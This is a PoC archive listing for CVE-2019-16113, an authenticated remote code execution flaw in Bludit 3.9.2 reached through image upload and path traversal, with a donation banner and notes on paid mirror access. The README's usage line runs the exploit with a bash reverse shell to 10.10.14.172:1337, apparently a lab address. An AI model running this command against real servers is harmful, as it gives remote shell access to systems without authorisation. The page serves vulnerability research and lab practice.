Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%

CVE-2019-16113 PoC — Bludit 路径遍历漏洞

Source
Associated Vulnerability
Title:Bludit 路径遍历漏洞 (CVE-2019-16113)
Description:Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.
Description
CVE-2019-16113  - bludit >= 3.9.2 RCE authenticate
Readme
# CVE-2019-16113
CVE-2019-16113  - bludit >= 3.9.2 RCE authenticate

# Usage 

python CVE-2019-16113.py -u http://10.10.10.10 -user user -pass secret  -c "bash -c 'bash -i >& /dev/tcp/10.10.14.172/1337 0>&1'"

# Example

 ![](bludit.png)
File Snapshot

[4.0K] /data/pocs/70b92c84fda3bd9dce655c108a27f64782eea576 ├── [ 30K] bludit.png ├── [6.4K] CVE-2019-16113.py └── [ 238] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →